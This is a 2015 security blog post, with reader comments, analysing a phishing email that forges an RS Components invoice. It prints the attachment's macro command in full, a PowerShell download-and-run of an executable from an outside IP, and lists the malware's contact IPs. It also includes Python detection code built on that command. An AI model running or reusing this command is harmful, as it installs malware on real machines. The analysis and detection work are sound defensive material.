
Tuesday, 31 March 2015

Malware spam: "83433-Your Latest Documents from RS Components 659751716"

This very convincing looking email pretending to be from RS has a malicious attachment. Although the email looks genuine, it is a simple forgery. RS are not sending out this email, nor have their systems been compromised in any way.

---------------------------------------------------------------

From:    Earlene Carlson
Date:    31 March 2015 at 11:30
Subject:    83433-Your Latest Documents from RS Components 659751716

RS Online Helping you get your job done.
You've received this email as a customer of rswww.com.


Dear Customer,


Please find attached your latest document(s) from RS.


Account Number   Date          Invoice Number   Document Total   Document Type
49487999         31-Mar-2015   659751716        £1133.90         Invoice



For all account queries please contact RS Customer Account Services.

Tel: 01536 752867
Fax: 01536 542205
Email: rpdf.billing@colt.net (subject box to read DOC eBilling)


If you have any technical problems retrieving your documents please contact Swiss Post Solutions Helpdesk on the following:

Tel: 0333 8727520
Email: customers@colt.net


Kind regards,

RS Customer Account Services.


This service is provided by Swiss Post Solutions on behalf of RS Components.
Helping you get your job done


RS Components Ltd, Birchington Road, Weldon, Corby, Northants, NN17 9RS, UK.
Registered No. 1002091. http://rswww.com. RS Online Help: 01536 752867.

---------------------------------------------------------------

The reference numbers, names and email addresses vary, but all come with a malicious and apparently randomly-named attachment (e.g. G-A6298638294134271075684-1.doc).

There are probably several different variants of this, but I have seen just one working example of the attachment, which contains this malicious macro [pastebin] that executes the following command:

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://185.91.175.64/jsaxo8u/g39b2cx.exe','%TEMP%\4543543.cab'); expand %TEMP%\4543543.cab %TEMP%\4543543.exe; start %TEMP%\4543543.exe;

For some reason, the EXE is downloaded from http://185.91.175.64/jsaxo8u/g39b2cx.exe with a CAB extension and then run through EXPAND which.. errr.. does nothing much. The file is saved as %TEMP%\4543543.exe, and it has a VirusTotal detection rate of 3/57.

Analysis is still pending, but the VirusTotal report does indicate that the malware phones home to 188.120.225.17 (TheFirst-RU, Russia), which I strongly recommend blocking. Check back for more updates later.

UPDATE:
Automated analysis [1] [2] [3] [4] shows attempted connections to the following IPs:

188.120.225.17 (TheFirst-RU, Russia)
1.164.114.195 (Data Communication Business Group, Taiwan)
2.194.41.9 (Telecom Italia Mobile, Italy)
46.19.143.151 (Private Layer INC, Switzerland)
199.201.121.169 (Synaptica, Canada)

It also drops another version of the downloader binary called edg1.exe with a 2/57 detection rate plus a Dridex DLL with a detection rate of 1/57.

Recommended blocklist:
188.120.225.17
1.164.114.195
2.194.41.9
46.19.143.151
199.201.121.169
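As an added example (not code from the original post), the following Python checks process-creation command lines for the download-as-CAB-then-EXPAND pattern used by the macro command above, and pulls the download host out of any URL so it can be compared against the recommended blocklist. The log lines are constructed for the demonstration and their host|user|cmdline layout is an assumption, not any particular product's format.

```python
import re
from urllib.parse import urlparse

# The post's recommended blocklist plus the download host named in the macro's command.
BLOCKLIST = {
    "185.91.175.64", "188.120.225.17", "1.164.114.195",
    "2.194.41.9", "46.19.143.151", "199.201.121.169",
}

# One regex per feature of the macro's command line; most of them hitting is a strong
# signal even when the URL and the random file names change between variants.
INDICATORS = {
    "powershell_bypass": re.compile(r"powershell(?:\.exe)?.*-ExecutionPolicy\s+bypass", re.I),
    "webclient_download": re.compile(r"DownloadFile\(", re.I),
    "temp_cab": re.compile(r"%TEMP%\\[^\s'\"]+\.cab", re.I),
    "expand_to_exe": re.compile(r"\bexpand\b.*\.cab.*\.exe", re.I),
    "start_from_temp": re.compile(r"\bstart\s+%TEMP%\\[^\s;]+\.exe", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)

def analyse_cmdline(cmdline):
    """Return (matched indicator names, download hosts, blocklisted hosts)."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    hosts = [h for h in (urlparse(u).hostname for u in URL_RE.findall(cmdline)) if h]
    blocked = [h for h in hosts if h in BLOCKLIST]
    return hits, hosts, blocked

def scan_log(lines, min_hits=3):
    """Flag lines matching at least min_hits indicators or downloading from a
    blocklisted host. Layout 'host|user|cmdline' is a constructed format."""
    alerts = []
    for line in lines:
        host, user, cmdline = line.split("|", 2)
        hits, dl_hosts, blocked = analyse_cmdline(cmdline)
        if len(hits) >= min_hits or blocked:
            alerts.append({"host": host, "user": user, "hits": hits,
                           "download_hosts": dl_hosts, "blocklisted": blocked})
    return alerts

# Constructed sample: line 1 is the command from the macro in the post, line 2
# is benign, line 3 is a variant with new file names and an unlisted host.
SAMPLE_LOG = [
    "WS01|alice|cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://185.91.175.64/jsaxo8u/g39b2cx.exe','%TEMP%\\4543543.cab'); expand %TEMP%\\4543543.cab %TEMP%\\4543543.exe; start %TEMP%\\4543543.exe;",
    "WS02|bob|powershell.exe -NoProfile -File C:\\Scripts\\inventory.ps1",
    "WS03|carol|cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://192.0.2.10/x/y.exe','%TEMP%\\1.cab'); expand %TEMP%\\1.cab %TEMP%\\1.exe; start %TEMP%\\1.exe;",
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

The third sample line is flagged on the command-line shape alone, which is the point: the blocklist catches this sample, the indicator count catches the next one with fresh IPs and file names.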

6 comments:

Andy said...

I've just received this email as well, I have just deleted it - thanks.

Zoe2293 said...

I also received this email. I opened it as it was convincing; however, I did not download the file attached. I am a Mac user and was wondering if anything could have snuck on to my laptop?

alistairlowe said...

Thank you for the heads up, I received this and nearly panicked, it is rather convincing.

kid said...

You're saving computers, THANKS! This looked very convincing, almost clicked the attachment for more info.

caulkehead said...

Yup - spam e-mail just received. Having just placed a bona fide order from RSC, I was expecting an invoice, so this particular scam seems to be relying on less-observant purchasers of RS products, and whoever it is presumably has access to the RS sales data. RD London

Jaine said...

Hi,

Another address worth blocking is 185.91.175.64